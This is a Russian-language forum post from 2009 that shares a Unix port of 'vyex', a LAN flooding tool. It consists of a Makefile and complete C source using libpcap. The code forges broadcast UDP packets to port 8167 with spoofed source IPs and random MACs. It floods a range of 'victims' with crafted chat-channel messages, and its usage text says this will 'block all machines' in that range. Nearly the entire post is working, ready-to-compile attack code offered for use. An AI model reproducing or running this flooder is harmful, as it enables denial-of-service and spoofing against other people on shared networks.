| hdkeeper |
02.05.2009 00:34 |
vyex for Unix
Флудер vyex, адаптированный для запуска на юникс-системах. Требует libpcap. Сборка проверялась на FreeBSD 7.1 и Debian Linux Etch.
Makefile
Код:
vyex: vyex.c
gcc -lpcap vyex.c -o vyex
vyex.c
Код:
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <time.h>
#include <pcap.h>
#define DWORD unsigned long
#define LENHDRETH 14
#define LENHDRIP 20
#define LENHDRUDP 8
#ifndef IP_HDRINCL
#define IP_HDRINCL 2 /* header is included with data */
#endif
typedef struct eth_hdr_struct
{
unsigned char dst[6];
unsigned char src[6];
unsigned short ftype;
} eth_hdr;
typedef struct ip_header_struct
{
unsigned char version;
unsigned char tos;
unsigned short int length;
unsigned short int id;
unsigned short int fragoff;
unsigned char ttl;
unsigned char protocol;
unsigned short int checksum;
unsigned long int src;
unsigned long int dest;
} ip_header;
typedef struct udp_header_struct
{
unsigned short int sport;
unsigned short int dport;
unsigned short int length;
unsigned short int checksum;
} udp_header;
#define VYPORT 8167
int msglen = 21;
//int sock;
struct sockaddr_in remote_addr;
unsigned char *msg;
unsigned char *packet;
unsigned long src,dst;
int lenippacket;
int interval;
pcap_t *adhandle;
char errbuf[PCAP_ERRBUF_SIZE]={0};
unsigned short ip_checksum(unsigned short *buffer, int size)
{
unsigned long cksum=0;
while (size > 1){cksum += *buffer++;size -= sizeof(unsigned short); }
if (size)cksum += *(unsigned char*)buffer;
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (unsigned short)(~cksum);
}
unsigned short udp_checksum( DWORD src_ip, DWORD dst_ip, udp_header *udp)
{
unsigned long sum = 0;
unsigned short len = udp->length;
sum += src_ip >> 16;
sum += src_ip & 0xffff;
sum += dst_ip >> 16;
sum += dst_ip & 0xffff;
sum += IPPROTO_UDP << 8;
sum += len;
len = ntohs(len);
unsigned short *s = (unsigned short *)udp;
while (len > 1)
{
sum += *s;
s++;
len -= 2;
}
if (len)
sum += *(unsigned char *)s;
sum = (sum & 0xffff) + (sum >> 16);
sum = (sum & 0xffff) + (sum >> 16);
return (unsigned short)(~sum);
}
unsigned char src_mac[6];// = {rand()%256,rand()%256,rand()%256,rand()%256,rand()%256,rand()%256};
int conn()
{
eth_hdr *ethh = (eth_hdr *) packet;
ip_header *iph = (ip_header*) (packet+LENHDRETH);
udp_header *udph = (udp_header*) (packet+LENHDRETH+LENHDRIP);
memset(ethh->dst,0xff,6);
memcpy(ethh->src,src_mac,6);
ethh->ftype = 0x0008;
memset(iph,0,LENHDRIP);
memset(udph,0,LENHDRUDP);
iph->version=0x45;
iph->length=htons(lenippacket);
iph->id=htons(VYPORT);
iph->ttl=0xff;
iph->protocol=IPPROTO_UDP;
iph->src=src;
iph->dest=dst;
iph->checksum=0;
udph->sport=htons(VYPORT);
udph->dport=htons(VYPORT);
udph->length=htons(lenippacket-LENHDRIP);
udph->checksum=0;
iph->checksum = ip_checksum( (unsigned short *) iph, sizeof(ip_header));
udph->checksum = udp_checksum( src, dst, udph);//!!!
return 0;
}
int send_()
{
if (pcap_inject( adhandle, packet, sizeof(eth_hdr)+lenippacket) == -1) {
fprintf( stderr, "Error sending the packet: '%s'\n", pcap_geterr(adhandle));
return -1;
}
return 0;
}
void usage()
{
printf("USAGE: vyex ether_iface victims_ip_start victims_ip_end dest_ip [interval] [channel] [timeout]\n");
printf("EXAMPLE1: vyex eth0 192.168.197.100 192.168.197.200 192.168.197.255\n");
printf("EXAMPLE2: vyex eth0 192.168.197.100 192.168.197.200 255.255.255.255\n");
printf("Will block all machines with IPs 192.168.197.100..192.168.197.200 on subnet 192.168.197.255 with default interval=100 msec and channel=#Main\n");
printf("Note that sometimes broadcast 255.255.255.255 is works, but sometimes you should specify your subnet's broadcast address as destination\n");
printf("vyex -l will list all existing interfaces\n\n");
printf("vyex based on Vcban by beef. Have phun! beef7@yandex.ru\n");
printf("Unix port by Keeper - nd_keeper@mail.ru\n");
}
void check_priv() {
if (geteuid() != 0) {
printf( "You should have root priviledges.\n");
exit(2);
}
}
void devlist()
{
pcap_if_t *alldevs, *dev;
char errbuf[PCAP_ERRBUF_SIZE];
check_priv();
if (pcap_findalldevs( &alldevs, errbuf) != 0) {
fprintf( stderr, "pcap_findalldevs(): %s\n", errbuf);
return;
}
printf( "%8s %-15s\n", "iface", "IP-address");
for (dev = alldevs; dev != NULL; dev = dev->next) {
pcap_addr_t *addr;
char *ip_addr = "NONE";
for (addr = dev->addresses; addr != NULL; addr = addr->next) {
struct sockaddr *dev_addr = addr->addr;
if ((dev_addr != NULL) && (dev_addr->sa_family == PF_INET)) {
ip_addr = (char*) inet_ntoa( ((struct sockaddr_in *) dev_addr)->sin_addr);
break;
}
}
printf( "%8s %-15s\n", dev->name, ip_addr);
}
pcap_freealldevs( alldevs);
}
void sig_exit( int signal) {
printf( "\nvyex terminated.\n");
exit(0);
}
int main( int argc, char **argv)
{
printf("\nvyex started...\n");
if ((argc == 2) && (strcmp( argv[1], "-l") == 0)) {
printf( "Dumping local interfaces...\n");
devlist();
return 0;
}
char chan[256]={0};
if (argc<5) {
usage();
return 0;
}
if (argc>5) {
interval=atoi(argv[5]);
} else {
interval=100;
}
printf( "Interval set to %d milliseconds...\n",interval);
if (argc>6) {
strncpy(chan,argv[6],255);
} else {
strcpy(chan,"#Main");
}
int chanlen = strlen(chan);
printf( "Channel set to %s...\n",chan);
if (argc>7) {
int timeout = atoi( argv[7]);
signal( SIGALRM, &sig_exit);
alarm( timeout);
printf( "Timeout set to %d seconds...\n", timeout);
}
check_priv();
adhandle = pcap_open_live( argv[1], 65536, 0, 1000, errbuf);
if (adhandle == NULL) {
fprintf( stderr, "pcap_open_live(): %s\n", errbuf);
return 1;
}
//pcap_setbuff (adhandle, 1024*1024);
msglen = 16+chanlen;
lenippacket=LENHDRIP+LENHDRUDP+msglen;
srand(time(NULL));
packet = (unsigned char *) malloc(LENHDRETH+lenippacket);
DWORD src_first = inet_addr(argv[2]); //aton
DWORD src_last = inet_addr(argv[3]); //aton
dst = inet_addr(argv[4]); //aton
src_mac[0] = 1+(rand()%0xfe);
src_mac[1] = 1+(rand()%0xfe);
src_mac[2] = 1+(rand()%0xfe);
src_mac[3] = 1+(rand()%0xfe);
src_mac[4] = 1+(rand()%0xfe);
src_mac[5] = 1+(rand()%0xfe);
while (1)
{
printf("SENDING");
fflush( stdout);
for (src = src_first;;)
{
memset(packet, 0, lenippacket);
msg=packet+LENHDRETH+LENHDRIP+LENHDRUDP;
msg[0]='X';
int x;
for(x=1;x!=10;x++)msg[x]=0x30+rand()%10;
msg[10]='2';
strcpy((char*)msg+11,chan);//"#Main");
memcpy(msg+11+chanlen,"\0/\0!\0",5);
/*msg[11+chanlen]='\0';
msg[11+chanlen+1]='/';
msg[11+chanlen+2]='\0';
msg[11+chanlen+3]='!';
msg[11+chanlen+4]='\0'; */
struct in_addr in;
in.s_addr = src;
printf(".");
fflush( stdout);
if (conn() == -1) return -1;
if (send_() == -1) return -2;
if (src==src_last) break;
src = htonl(ntohl(src)+1);
usleep( interval*1000);
}
printf("Cycle OK!\n");
//
}
return 0;
}
|
